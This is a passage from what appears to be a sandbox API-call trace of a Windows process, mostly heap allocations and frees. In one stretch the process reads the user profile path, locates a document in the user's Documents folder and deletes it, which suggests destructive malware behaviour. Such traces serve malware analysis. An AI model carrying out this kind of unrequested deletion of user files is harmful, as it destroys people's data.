lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0262.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0262.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b70 [0262.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa038 [0262.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d50 [0262.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0262.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cd8 [0262.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0262.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0262.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0262.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0262.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.281] CloseHandle (hObject=0x294) returned 1 [0262.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3561010 | out: hHeap=0x25c0000) returned 1 [0262.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0262.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0262.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0262.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0262.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0262.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0262.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0262.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0262.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0262.285] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0262.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0262.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0262.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0262.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0262.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0262.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0262.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0262.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0262.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0262.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0262.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0262.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0262.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0262.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0262.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0262.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0262.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0262.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0262.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0262.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0262.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0262.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0262.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0262.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0262.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0262.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0262.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0262.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0262.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0262.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0262.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0262.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0262.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0262.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0262.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0262.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0262.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0262.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0262.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0262.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0262.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0262.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0262.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0262.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0262.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0262.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0262.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0262.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0262.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0262.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0262.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0262.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0262.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0262.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3571018 | out: hHeap=0x25c0000) returned 1 [0262.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0262.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0262.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0262.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0262.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0262.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0262.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0262.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0262.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0262.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0262.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0262.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0262.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0262.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0262.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0262.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0262.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0262.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0262.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0262.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0262.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0262.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0262.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0262.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0262.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0262.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0262.290] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0262.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0262.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0262.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0262.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0262.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0262.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0262.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0262.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0262.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0262.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0262.291] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0262.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0262.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0262.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ea0 [0262.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0262.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0262.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d20 [0262.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0262.291] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0262.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0262.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0262.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0262.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0262.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0262.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0262.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0262.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0262.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0262.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0262.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0262.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0262.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0262.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0262.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0262.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0262.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0262.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0262.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0262.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0262.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0262.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0262.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0262.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0262.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0262.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0262.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0262.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0262.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x76) returned 0x24f5278 [0262.293] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/EJnozy8q_wA_6u.odt", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EJnozy8q_wA_6u.odt", lpFilePart=0x8bedfc*="EJnozy8q_wA_6u.odt") returned 0x3a [0262.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0262.293] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EJnozy8q_wA_6u.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ejnozy8q_wa_6u.odt")) returned 0x20 [0262.293] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EJnozy8q_wA_6u.odt", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9f5500, ftCreationTime.dwHighDateTime=0x1d4d241, ftLastAccessTime.dwLowDateTime=0x4d68c6d0, ftLastAccessTime.dwHighDateTime=0x1d4d4ad, ftLastWriteTime.dwLowDateTime=0x4d68c6d0, ftLastWriteTime.dwHighDateTime=0x1d4d4ad, nFileSizeHigh=0x0, nFileSizeLow=0x8e1e, dwReserved0=0x1b4c, dwReserved1=0x4, cFileName="EJnozy8q_wA_6u.odt", cAlternateFileName="EJNOZY~1.ODT")) returned 0xaa5920 [0262.293] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EJnozy8q_wA_6u.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ejnozy8q_wa_6u.odt")) returned 1 [0262.295] FindNextFileW (in: hFindFile=0xaa5920, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9f5500, ftCreationTime.dwHighDateTime=0x1d4d241, ftLastAccessTime.dwLowDateTime=0x4d68c6d0, ftLastAccessTime.dwHighDateTime=0x1d4d4ad, ftLastWriteTime.dwLowDateTime=0x4d68c6d0, ftLastWriteTime.dwHighDateTime=0x1d4d4ad, nFileSizeHigh=0x0, nFileSizeLow=0x8e1e, dwReserved0=0x1b4c, dwReserved1=0x4, cFileName="EJnozy8q_wA_6u.odt", cAlternateFileName="EJNOZY~1.ODT")) returned 0 [0262.295] FindClose (in: hFindFile=0xaa5920 | out: hFindFile=0xaa5920) returned 1 [0262.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0262.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0262.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0262.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0262.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0262.296] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0262.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0262.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0262.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0262.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0262.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0262.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0262.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0262.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0262.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0262.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0262.296] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0262.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0262.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0262.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d20 [0262.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0262.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0262.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0262.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0262.297] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0262.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0262.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0262.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0262.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0262.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0262.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0262.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0262.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0262.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0262.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0262.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0262.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0262.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0262.298] 